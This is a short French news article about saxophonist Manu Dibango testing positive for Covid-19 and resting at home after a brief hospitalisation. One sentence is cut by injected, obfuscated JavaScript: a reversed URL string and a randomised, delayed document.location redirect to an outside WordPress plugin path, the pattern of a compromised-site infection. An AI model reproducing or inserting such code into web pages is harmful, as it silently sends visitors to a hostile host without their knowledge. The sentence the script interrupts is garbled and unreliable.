AFRIQUE

Coronavirus : le saxophoniste Manu Dibango testé positif

La légende camerounaise, âgée de 86 ans, a annoncé, sur sa page Facebook, avoir été testée positive au Covid-19 et être désormais hors de danger.

Le saxophoniste et chanteur camerounais, Manu Dibango, est testé positif au coronavirus. Considéré comme une légende de la musique en Afrique et dans le monde, l’état de santé de Manu Dibango était au centre de nombreuses rumeurs avant qu’il ne clarifie lui-même la situation avec son équipe. Né en 1933 à Douala au Cameroun, Emmanuel N’Djoké Dibango de son vrai nom arrive en France – où il réside encore aujourd’hui – à Marseille au printemps 1949. Après une brève hospitalisation, l’artiste de 86 ans est rentré chez lui et se repose. Il reste optimiste et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne déjà rendez-vous prochainement à son public. 

Le célèbre saxophoniste et chanteur camerounais est le premier artiste africain aux États-Unis à recevoir un disque d’or avec son légendaire Soul Makossa. Depuis près de 60 ans, il sillonne le monde avec passion et bonne humeur pour partager sa musique. L’information a été largement relayée sur les réseaux sociaux où ses nombreux fans lui apportent leur soutien. 

Source: Lepoint

%d blogueurs aiment cette page :